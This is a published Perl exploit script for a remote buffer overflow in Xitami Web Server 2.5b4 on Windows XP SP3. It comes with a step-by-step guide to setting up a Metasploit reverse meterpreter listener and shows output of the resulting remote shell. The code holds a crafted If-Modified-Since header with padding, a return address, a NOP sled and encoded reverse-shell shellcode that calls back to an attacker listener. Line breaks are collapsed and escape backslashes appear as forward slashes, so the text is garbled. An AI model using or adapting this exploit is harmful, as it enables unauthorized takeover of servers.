# Title : Xitami Web Server 2.5b4 Remote Buffer Overflow Exploit
# Published : 2011-06-03
# Author : mr.pr0n
#!/usr/bin/perl# -------------------------------------------------------------# Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit.# Exploit coded by mr.pr0n [http://s3cure.gr] .# Many greetz to krumel for his help :-).# -------------------------------------------------------------# -------------------------------------------------------------# Tested on: Xitami 2.5b4 / English Windows XP - SP3# -------------------------------------------------------------# ------------------------------------------------------------------------# Bug for 2.5c2 discovered by Krystian Kloskowski (h07) <h07@interia.pl># -------------------------------------------------------------------------## ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ *## --------------------------------# Quick user guide!# --------------------------------# 1st Step: Set up the listener.# --------------------------------# msf > use multi/handler# msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_ord_tcp # PAYLOAD => windows/meterpreter/reverse_ord_tcp# msf exploit(handler) > set LHOST 192.168.178.25# LHOST => 192.168.178.25# msf exploit(handler) > exploit## [*] Started reverse handler on 192.168.178.25:4444 # [*] Starting the payload handler...# # --------------------------------# 2nd Step: Execute the exploit.# --------------------------------# root@bt:~# cd Desktop/ # root@bt:~# ./Xitami2_5b4.pl ## #----[ mr.pr0n ]---------------------------------------------------------## # Target App: Xitami Web Server 2.5b4 ## # Attack : Remote Buffer Overflow Exploit. ## # Target OS : Windows XP Pro English [Service Pack 3]. 
## #---------------------------------------------[ http://s3cure.gr ]-------### Enter your target's IP (e.g.: 192.168.0.123)# > 192.168.178.37## [*] Sending the evil header at: 192.168.178.37 ...# [*] OK, exploitation Done!# [*] Check please for the shell...# # --------------------------------# 3nd Step: N'joy your shell :-)# --------------------------------# [*] Transmitting intermediate stager for over-sized stage...(216 bytes)# [*] Sending stage (749056 bytes) to 192.168.178.37# [*] Meterpreter session 1 opened (192.168.178.25:4444 -> 192.168.178.37:1031) at 2011-05-31 02:13:33 +0300## meterpreter > sysinfo# Computer : xxxxxx-xxxxxx# OS : Windows XP (Build 2600, Service Pack 3).# Architecture : x86# System Language : en_US# Meterpreter : x86/win32# meterpreter > shell# Process 320 created.# Channel 1 created.# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:/Xitami>## ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ *#use IO::Socket;print "/n#----[ mr.pr0n ]---------------------------------------------------------#/n";print "# Target App: Xitami Web Server 2.5b4 #/n";print "# Attack : Remote Buffer Overflow Exploit. #/n";print "# Target OS : Windows XP Pro English [Service Pack 3]. 
#/n";print "#---------------------------------------------[ http://s3cure.gr ]-------#/n";print "/nEnter your target's IP (e.g.: 192.168.0.123)";print "/n> ";$target=<STDIN>;chomp($target);#---------------------------#$junk = "/x41" x 72; # 72 x "A".$RET = "/x53/x2b/xab/x71"; # ws2_32.dll push ESP - ret - (Windows XP SP3 - [En]).$jmp = "/xeb/x22"; # JMP +0x22.$nops = "/x90" x 100; # 100 Nops.#---------------------------## ./msfpayload win32_reverse_ord EXITFUNC=thread LHOST=192.168.178.25 LPORT=4444 R | ./msfencode -e PexAlphaNum# [*] Using Msf::Encoder::PexAlphaNum with final size of 261 bytes$shellcode ="/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49"."/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36"."/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34"."/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41"."/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x41/x33/x4b/x4d"."/x46/x56/x4b/x48/x43/x34/x42/x43/x4b/x48/x42/x44/x4e/x30/x4b/x48"."/x42/x55/x4e/x31/x4b/x38/x44/x31/x4b/x48/x44/x37/x42/x42/x4d/x4a"."/x4d/x4a/x50/x54/x43/x50/x48/x30/x4d/x53/x44/x43/x43/x53/x4f/x45"."/x44/x33/x45/x37/x4f/x4e/x4b/x58/x4c/x36/x4a/x50/x4b/x58/x45/x54"."/x4e/x33/x4b/x38/x4e/x54/x45/x50/x4a/x47/x4b/x58/x4e/x44/x4d/x50"."/x4e/x41/x41/x30/x49/x4e/x4b/x58/x41/x34/x4a/x55/x41/x50/x4a/x4e"."/x4b/x48/x41/x57/x4e/x53/x41/x50/x50/x4e/x43/x50/x49/x36/x4e/x50"."/x43/x55/x4c/x46/x41/x30/x4c/x36/x44/x30/x4f/x4f/x42/x4d/x47/x39"."/x4a/x36/x42/x4c/x4a/x4a/x44/x4b/x49/x51/x4a/x36/x44/x50/x42/x50"."/x41/x31/x4e/x35/x49/x58/x41/x4e/x43/x35/x47/x4b/x4e/x50/x43/x35"."/x41/x45/x47/x55/x41/x45/x4c/x56/x42/x41/x41/x55/x47/x35/x48/x55"."/x4f/x4f/x45/x4e/x5a";if ($socket = IO::Socket::INET->new (PeerAddr => $target, PeerPort => "80", Proto => "TCP")) { $exploit = $junk.$RET.$jmp.$nops.$shellcode; # #---------------------------------# # If we send an If-Modified-Since header, # containing an overly long string (for example our exploit) # it may 
be possible to execute (remotely) a payload!! #---------------------------------# # # This is the evil header! }:-) $header = "GET / HTTP/1.1/r/n". "Host: ".$target." /r/n". "If-Modified-Since: p0wnp0wnb00m! "." $exploit/r/n"; print "/n[*] Sending the evil header at: $target .../n"; print $socket $header."/r/n"; sleep(1); close($socket); print "[*] OK, exploitation Done!/n"; print "[*] Check please the shell../n/n"; }else { print "[-] Connection to $target failed!/n"; }